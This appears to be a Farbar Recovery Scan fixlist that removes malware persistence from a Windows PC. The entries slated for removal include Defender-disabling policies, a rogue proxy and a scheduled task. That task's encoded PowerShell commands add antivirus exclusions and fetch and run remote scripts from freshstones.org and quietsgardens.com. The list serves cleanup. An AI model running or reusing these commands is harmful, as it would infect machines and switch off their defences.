CloseProcesses:
SystemRestore: On
CreateRestorePoint:
HKLM\...\Run: [hrvbs] => c:\windows\h.vbs [92 2025-12-17] () [File not signed]
HKLM\...\Policies\Explorer: [SettingsPageVisibility] hide:network-proxy <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(1): schtasks -> /run /tn \SystemResourcesUpdaterLegacy-g76sn8 <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(2): powershell -> -NoProfile -EncodedCommand IwAgADUAMwBjADYAYQA2AGQAOQAtADIAOQBjAGMALQA0ADEAOABiAC0AYQAxADYAZQAtAGIAYQAyAGIAZAAxAGYAYgA2AGUAMgBmAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBQAEkARAAgACQAUABJAEQAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACAALQBGAG8AcgBjAGUA <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(3): powershell -> -NoProfile -EncodedCommand IwAgADEAYQBhADAAMQBlADMAYQAtADAANABhAGIALQA0ADYAZQA0AC0AYgBkADUANwAtAGIANQBiADgAYQA2ADYAMwBhAGYAZQBiAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAgAC0ARgBvAHIAYwBlAA== <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(4): powershell -> -NoProfile -EncodedCommand IwAgADUAYwBmADYAYwBmADgAMAAtADkANwBiAGUALQA0ADcAZgA5AC0AYQBmADEANAAtADYAMABiADAAYQAwADkAMwA4ADMANgBiAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAGYAcgBlAHMAaABzAHQAbwBuAGUAcwAuAG8AcgBnACAAfAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgA= <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(5): powershell -> -NoProfile -EncodedCommand IwAgAGEAMgAxADcAYgBiAGEAMAAtADIAZAA0ADYALQA0ADUAYgBhAC0AYgA4ADUANAAtAGYAYwA2ADkAMABhADcAZABiADIAOAAzAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHEAdQBpAGUAdABzAGcAYQByAGQAZQBuAHMALgBjAG8AbQAgAHwAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4A <==== ATTENTION
ManualProxies: 1127.0.0.1:58128 <==== ATTENTION
HKU\S-1-5-21-805122580-2970808790-2044927905-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
DisableService: AdvancedSystemCareService19
S3 cpuz154; \??\C:\WINDOWS\temp\cpuz154\cpuz154_x64.sys [X] <==== ATTENTION
ContextMenuHandlers1_S-1-5-21-805122580-2970808790-2044927905-1001: [ kwpsshellext] -> {28A80003-18FD-411D-B0A3-3C81F618E22B} => C:\Users\Admin\AppData\Local\Kingsoft\WPS Office\11.2.0.11042\office6\kwpsmenushellext64.dll -> No File
ContextMenuHandlers4_S-1-5-21-805122580-2970808790-2044927905-1001: [ kwpsshellext] -> {28A80003-18FD-411D-B0A3-3C81F618E22B} => C:\Users\Admin\AppData\Local\Kingsoft\WPS Office\11.2.0.11042\office6\kwpsmenushellext64.dll -> No File
FirewallRules: [{a019d323-5ec6-44ab-a0e1-0022e742d03e}] => (Allow) C:\Users\Admin\1\Microsoft_Entra_Password_Protection.exe => No File
FirewallRules: [{532d2282-458a-447a-9f0a-8cb154ee51c2}] => (Allow) C:\Users\1\Microsoft_Entra_Password_Protection.exe => No File
Reboot: